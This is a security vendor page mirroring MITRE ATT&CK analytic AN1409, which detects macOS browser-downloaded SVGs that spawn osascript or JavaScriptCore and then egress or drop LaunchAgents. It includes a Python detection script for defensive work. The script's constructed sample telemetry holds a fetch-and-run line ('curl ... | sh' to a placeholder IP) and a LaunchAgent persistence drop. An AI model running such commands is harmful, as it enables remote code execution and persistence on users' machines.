MITRE ATT&CK® Analytic

AN1409: Analytic 1409

Detects SVGs downloaded via browser that invoke AppleScript, osascript, or JavaScriptCore processes, followed by network egress or file drop to LaunchAgents or ~/Library.

Domain: Enterprise. Object: AN1409 (Analytic). Object version: 1.0.
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

AN1409 is a macOS detection analytic focused on a suspicious chain: a browser-downloaded SVG leading to AppleScript, osascript, or JavaScriptCore execution, followed by network activity or file placement in persistence-relevant user library locations. For leaders, the practical value is validating whether macOS endpoint, browser download, process, file, and network telemetry can connect these events into one investigation story rather than treating them as isolated alerts.

Executive priority

Prioritize this analytic where macOS endpoints are material to business operations, executive workstations, developer environments, or regulated workflows. The decision value is not just detecting a file type; it is proving the organization can identify suspicious script execution originating from web content and quickly determine whether follow-on activity created persistence or external communication. This supports incident triage, audit evidence for endpoint monitoring, and control prioritization around macOS visibility and browser-delivered threats.

Technical view

SOC and detection teams should validate that they can correlate the following events into one sequence: a macOS browser download event (or an endpoint file-creation record carrying the com.apple.quarantine attribute) for an SVG file; child or near-time execution of osascript, AppleScript, or a JavaScriptCore-related process such as the jsc helper binary; and subsequent network egress or file writes under ~/Library, in particular ~/Library/LaunchAgents. Because the official object provides no detection logic and no tactic mapping, treat AN1409 as a behavior pattern to operationalize locally. Weight the evidence by event timing, parent-child process context (a browser in the interpreter's process ancestry is stronger evidence than time proximity alone), user context, and whether the observed writes under ~/Library are expected behavior for installed software.

Likely telemetry

  • macOS endpoint process creation telemetry, including parent-child process relationships
  • Browser download telemetry or endpoint file creation records identifying SVG files downloaded via browser (on macOS the com.apple.quarantine extended attribute on the file records the downloading application, and the LaunchServices QuarantineEventsV2 database under ~/Library/Preferences records the origin URL where the browser supplied one)
  • Command-line or script execution metadata for AppleScript, osascript, and JavaScriptCore-related processes (for example the jsc command-line helper shipped in JavaScriptCore.framework)
  • Network connection or egress telemetry tied back to endpoint process context
  • File creation or modification events under ~/Library, especially ~/Library/LaunchAgents (and /Library/LaunchAgents for system-wide agents)

Detection direction

  • Validate that telemetry can correlate browser-downloaded SVG files to subsequent script interpreter or JavaScriptCore process execution on macOS.
  • Tune detections around sequence and proximity: download, script-related execution, then network egress or file drop to LaunchAgents or ~/Library.
  • Review benign macOS software, browser extensions, developer tools, and administrative scripts that may legitimately use osascript or write under ~/Library to reduce false positives.
  • Prioritize alerts where script execution has a browser lineage, unusual command-line context, new or unsigned files, unexpected network destinations, or writes to LaunchAgents.
  • Identify blind spots where browser downloads are not logged, process command lines are missing, network telemetry is not process-attributed, or user Library file writes are not collected.
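As an added worked example (not part of the MITRE object or of Glexia's analysis), the Python script below applies the sequence logic from the Technical view and the Detection direction bullets to a constructed stream of macOS endpoint events. The event schema, process names, pids, paths, destinations and scoring weights are assumptions for illustration, not a real EDR export. It treats a browser in the interpreter's process ancestry as stronger evidence than time proximity alone, so the benign osascript launched from launchd still surfaces (it writes under ~/Library) but ranks below the browser-descended chain that both egresses and drops a LaunchAgent.

```python
import json
import re
from datetime import datetime, timedelta

# Process basenames named by AN1409. osascript runs AppleScript and JXA;
# jsc is the JavaScriptCore command-line helper inside JavaScriptCore.framework.
# Extend both sets to match the naming in your own telemetry.
SCRIPT_IMAGES = {"osascript", "jsc"}
BROWSER_IMAGES = {"Safari", "Google Chrome", "firefox", "Microsoft Edge"}

# CONSTRUCTED sample telemetry, not real logs: one JSON object per line in the
# shape of a generic EDR export. Every record has ts, type, uid, pid, image;
# process_exec adds ppid and cmdline; file_create adds path (plus the quarantine
# agent for browser downloads); network_connect adds dest. Lineage is illustrative.
SAMPLE_EVENTS = r"""
{"ts":"2024-05-01T10:00:00Z","type":"file_create","uid":501,"pid":300,"image":"Safari","path":"/Users/alice/Downloads/invoice.svg","quarantine_agent":"com.apple.Safari"}
{"ts":"2024-05-01T10:00:07Z","type":"process_exec","uid":501,"pid":410,"ppid":300,"image":"osascript","cmdline":"osascript -e 'do shell script \"curl -s https://203.0.113.10/x | sh\"'"}
{"ts":"2024-05-01T10:00:08Z","type":"network_connect","uid":501,"pid":410,"image":"osascript","dest":"203.0.113.10:443"}
{"ts":"2024-05-01T10:00:11Z","type":"file_create","uid":501,"pid":410,"image":"osascript","path":"/Users/alice/Library/LaunchAgents/com.example.update.plist"}
{"ts":"2024-05-01T10:03:00Z","type":"process_exec","uid":501,"pid":520,"ppid":1,"image":"osascript","cmdline":"osascript /Users/alice/Scripts/backup.scpt"}
{"ts":"2024-05-01T10:03:02Z","type":"file_create","uid":501,"pid":520,"image":"osascript","path":"/Users/alice/Library/Application Support/backup/state.json"}
{"ts":"2024-05-01T11:30:00Z","type":"file_create","uid":501,"pid":300,"image":"Safari","path":"/Users/alice/Downloads/logo.svg","quarantine_agent":"com.apple.Safari"}
"""

USER_LIBRARY = re.compile(r"^/Users/[^/]+/Library/")


def parse_events(text):
    """Parse JSON lines into dicts with a datetime ts, sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        e = json.loads(line)
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    events.sort(key=lambda e: e["ts"])
    return events


def classify_drop(path):
    """Return the persistence-relevant class of a written path, or None."""
    if "/Library/LaunchAgents/" in path:
        return "launchagent"   # ~/Library/LaunchAgents or /Library/LaunchAgents
    if USER_LIBRARY.match(path):
        return "user_library"  # anything else under ~/Library
    return None


def has_browser_ancestor(pid, parents, images, max_depth=8):
    """Walk the ppid chain and report whether a browser is in the ancestry."""
    cur = parents.get(pid)
    for _ in range(max_depth):
        if cur is None or cur <= 1:  # reached launchd or an unknown parent
            return False
        if images.get(cur) in BROWSER_IMAGES:
            return True
        cur = parents.get(cur)
    return False


def find_chains(events, window=timedelta(minutes=10)):
    """Build download -> interpreter -> egress/drop chains and score them."""
    parents = {e["pid"]: e["ppid"] for e in events if "ppid" in e}
    images = {e["pid"]: e["image"] for e in events}
    downloads = [e for e in events if e["type"] == "file_create"
                 and e["path"].lower().endswith(".svg") and e.get("quarantine_agent")]
    chains = []
    for dl in downloads:
        deadline = dl["ts"] + window
        for sc in events:  # stage 2: interpreter launched by the same user in the window
            if (sc["type"] != "process_exec" or sc["image"] not in SCRIPT_IMAGES
                    or sc["uid"] != dl["uid"] or not dl["ts"] <= sc["ts"] <= deadline):
                continue
            followups = []  # stage 3: egress or persistence-relevant write by that process
            for e in events:
                if e["pid"] != sc["pid"] or not sc["ts"] <= e["ts"] <= deadline:
                    continue
                if e["type"] == "network_connect":
                    followups.append(("egress", e["dest"]))
                elif e["type"] == "file_create" and classify_drop(e["path"]):
                    followups.append((classify_drop(e["path"]), e["path"]))
            if not followups:
                continue
            lineage = ("browser_ancestor" if has_browser_ancestor(sc["pid"], parents, images)
                       else "near_time_only")
            # Assumed weights for triage ordering only; tune against local baselines.
            score = 1 + (2 if lineage == "browser_ancestor" else 0)
            score += sum({"launchagent": 2, "egress": 1, "user_library": 1}[k] for k, _ in followups)
            chains.append({"download": dl["path"], "script_pid": sc["pid"],
                           "script_image": sc["image"], "cmdline": sc.get("cmdline", ""),
                           "lineage": lineage, "followups": followups, "score": score})
    chains.sort(key=lambda c: -c["score"])
    return chains


if __name__ == "__main__":
    for chain in find_chains(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(chain))
```

Run directly to print the two chains as JSON, highest score first. The near_time_only chain is the false-positive class the tuning bullet above warns about: it is reported so that the lineage label and the absence of egress can be used for suppression or lower priority, rather than dropped silently.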

Mitigation priorities

  • Ensure macOS endpoint monitoring captures process, file, browser download, and network evidence needed to support this analytic.
  • Harden and monitor script execution paths relevant to AppleScript, osascript, and JavaScriptCore according to organizational policy.
  • Review controls and change management around LaunchAgents and user Library persistence locations.
  • Use incident response playbooks that preserve downloaded files, process lineage, file-drop locations, and network indicators for rapid scoping.
  • Use this analytic as validation evidence for macOS endpoint visibility and managed detection readiness rather than assuming coverage from generic malware controls.

Analyst notes and limits

The supplied ATT&CK object is a detection analytic, not a technique, and no relationships, tactic mapping, or formal detection logic were provided. The strongest use is as a validation pattern for macOS detection engineering and SOC triage around browser-originated script execution followed by egress or persistence-relevant file activity.

This take is limited to the official STIX fields, the MITRE external reference, and the supplied description. It does not establish adversary attribution, active exploitation, impact, prevalence, or guaranteed detection. Local baselines are required to distinguish benign macOS automation and software behavior from suspicious activity.

Official MITRE ATT&CK definition

Analytic 1409

Detects SVGs downloaded via browser that invoke AppleScript, osascript, or JavaScriptCore processes, followed by network egress or file drop to LaunchAgents or ~/Library.

View the same entry on attack.mitre.org (MITRE-hosted reference).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the table that follows compares the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 1.0
Created: (not present in the mirrored snapshot)
Modified: (not present in the mirrored snapshot)
Raw hash: fdc124840e2f5b12...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | (empty) | 1.0 | (empty) | Current bundle | fdc124840e2f…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] mitre-attack AN1409 (MITRE external reference)

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.